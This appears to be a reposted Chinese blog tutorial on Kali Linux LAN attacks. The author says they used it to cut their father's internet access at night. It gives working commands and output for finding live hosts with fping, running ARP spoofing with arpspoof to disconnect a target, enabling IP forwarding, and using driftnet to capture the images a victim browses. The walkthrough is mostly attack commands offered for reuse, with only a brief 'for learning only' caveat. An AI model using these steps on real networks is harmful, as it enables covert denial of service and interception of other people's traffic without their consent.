kali关于局域网的小操作

前言:最近我爸总是在今日头条看电视剧(不要钱,没广告,疫情期间也没啥事儿),但是一般回到夜里一点多,对身体不好,我妈说我爸睡觉太晚,想让他早点睡觉,他不听,无奈之举,我用了kali,让他断网。以下知识仅供学习。

1. arp断网

1.1 所需要的工具

  • VM虚拟机(网络选择桥接模式), kali操作系统
  • fping,类似与win下面的ping,这个可以帮助我们查看局域网中存活的ip。

1.2 具体操作

  1. ifconfig => 用于查看ip
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.101  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::20c:29ff:fe69:929a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:69:92:9a  txqueuelen 1000  (Ethernet)
        RX packets 1635316  bytes 226317367 (215.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 141839  bytes 141216587 (134.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1996  bytes 222108 (216.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1996  bytes 222108 (216.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

如果有wlan0就用wlan0也可以。
2. ip route show => 可以查询到我们的网关

root@kali:~# ip route show
default via 192.168.1.1 dev eth0 proto dhcp metric 100 
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.101 metric 100 
  1. 看看局域网存活的ip都有谁 命令 fping -asg 192.168.1.0/24
root@kali:~# fping -asg 192.168.1.0/24
192.168.1.1
192.168.1.101
192.168.1.107
192.168.1.103
192.168.1.102
192.168.1.109
192.168.1.104

后面还有一堆我就不写了,基本都是没有存活的ip。这里说一下,我的是192.168.1.103

  1. arp欺骗,命令很简单,这里我用我的ip测试
root@kali:~# arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a

说一下这个命令格式:
这个命令的意思是arp欺骗,别人发送的arp包都到我的网卡上来,第一个参数是监听本地的eth0网卡,第一个IP是受害者ip,第二个是网关ip。现在我的今日头条刷新不了了。但是别人可以给你发微信你可以收到。
昨天更新完kali之后,发现没有arpspoof命令,这个用自己安装一下就ok,具体操作去github上读读人家的readme.md,里面有详细命令。
使用Ctrl+z可以终止欺骗。
写到这里其实已经算是写完了,想了想既然用到了arpspoof,那不得不提的就是driftnet

2. 查看局域网具体ip浏览的图片

承接上回书说到driftnet,这里用这个展示一下骚操作。
在终端输入driftnet,看看有没有这个工具,如果没有或者找不到命令就去github找找安装教程。这里给出github地址:driftnet安装教程可读readme.md

  1. 终端输入 echo 1 > /proc/sys/net/ipv4/ip_forward 进行ip转发,保证欺骗的ip可以正常上网,就是把文件里的0改成1
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# 
  1. 开始欺骗(以我的ip)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.103

-i就是指定网卡,-t 先指定网关,再指定攻击ip
有如下字样就是代表开始了:

root@kali:~# arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a

之后运行:

driftnet -i eth0

这里我拿今日头条搜索科比图片,driftnet不出意外就会有下面信息(我直接上传图片吧):
driftnet图片
之后的图片会保存到home中。
记录一下当前时间吧:

In [1]: from datetime import datetime                                           

In [2]: print(datetime.now())                                                   
2020-02-16 14:47:59.696041

In [3]: 
发布了5 篇原创文章 · 获赞 0 · 访问量 355

猜你喜欢

转载自blog.csdn.net/qq_33694648/article/details/104341432